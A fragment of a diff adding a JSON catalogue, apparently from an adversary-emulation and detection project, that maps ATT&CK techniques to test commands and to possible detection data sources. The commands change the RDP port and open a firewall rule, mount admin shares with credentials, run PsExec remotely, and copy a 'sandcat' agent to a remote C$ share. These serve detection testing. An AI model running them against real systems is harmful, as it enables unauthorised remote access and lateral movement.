"default": "3389" + }, + "NEW_Remote_Port": { + "description": "New RDP Listening Port", + "type": "String", + "default": "4489" + } + }, + "executor": { + "command": "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}\n", + "cleanup_command": "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1\nnetsh advfirewall firewall delete rule name=\"RDPPORTLatest-TCP-In\" >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process 
creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts 
(Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1021.002", + "command_list": [ + "cmd.exe /c \"net use \\\\#{computer_name}\\#{share_name} #{password} /u:DOMAIN\\Administrator\"\n", + "cmd.exe /c \"net use \\\\#{computer_name}\\C$ #{password} /u:#{user_name}\"\n", + "cmd.exe /c \"net use \\\\#{computer_name}\\#{share_name} P@ssw0rd1 /u:#{user_name}\"\n", + "cmd.exe /c \"net use \\\\Target\\#{share_name} #{password} /u:#{user_name}\"\n", + "New-PSDrive -name #{map_name} -psprovider filesystem -root 
\\\\#{computer_name}\\C$\n", + "New-PSDrive -name g -psprovider filesystem -root \\\\#{computer_name}\\#{share_name}\n", + "New-PSDrive -name #{map_name} -psprovider filesystem -root \\\\Target\\#{share_name}\n", + "#{psexec_exe} #{remote_host} -accepteula -c C:\\Windows\\System32\\cmd.exe\n", + "#{psexec_exe} \\\\localhost -accepteula -c #{command_path}\n", + "C:\\PSTools\\PsExec.exe #{remote_host} -accepteula -c #{command_path}\n", + "cmd.exe /Q /c #{command_to_execute} 1> \\\\127.0.0.1\\ADMIN$\\output.txt 2>&1\n", + "cmd.exe /Q /c hostname 1> \\\\127.0.0.1\\ADMIN$\\#{output_file} 2>&1\n", + "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n", + "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n", + "net use \\\\#{remote.host.fqdn}\\C$ /user:#{domain.user.name} #{domain.user.password}\n" + ], + "commands": [ + { + "command": "cmd.exe /c \"net use \\\\#{computer_name}\\#{share_name} #{password} /u:DOMAIN\\Administrator\"\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "cmd.exe /c \"net use \\\\#{computer_name}\\C$ #{password} /u:#{user_name}\"\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "cmd.exe /c \"net use \\\\#{computer_name}\\#{share_name} P@ssw0rd1 /u:#{user_name}\"\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "cmd.exe /c \"net use \\\\Target\\#{share_name} #{password} /u:#{user_name}\"\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "New-PSDrive -name #{map_name} -psprovider filesystem -root 
\\\\#{computer_name}\\C$\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "New-PSDrive -name g -psprovider filesystem -root \\\\#{computer_name}\\#{share_name}\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "New-PSDrive -name #{map_name} -psprovider filesystem -root \\\\Target\\#{share_name}\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "#{psexec_exe} #{remote_host} -accepteula -c C:\\Windows\\System32\\cmd.exe\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "#{psexec_exe} \\\\localhost -accepteula -c #{command_path}\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "C:\\PSTools\\PsExec.exe #{remote_host} -accepteula -c #{command_path}\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "cmd.exe /Q /c #{command_to_execute} 1> \\\\127.0.0.1\\ADMIN$\\output.txt 2>&1\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "cmd.exe /Q /c hostname 1> \\\\127.0.0.1\\ADMIN$\\#{output_file} 2>&1\n", + "source": "atomics/T1021.002/T1021.002.yaml", + "name": "Atomic Red Team Test - Remote Services: SMB/Windows Admin Shares" + }, + { + "command": "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n", + "source": "data/abilities/lateral-movement/40161ad0-75bd-11e9-b475-0800200c9a66.yml", + "name": "Mounts a network file share on a target computer" 
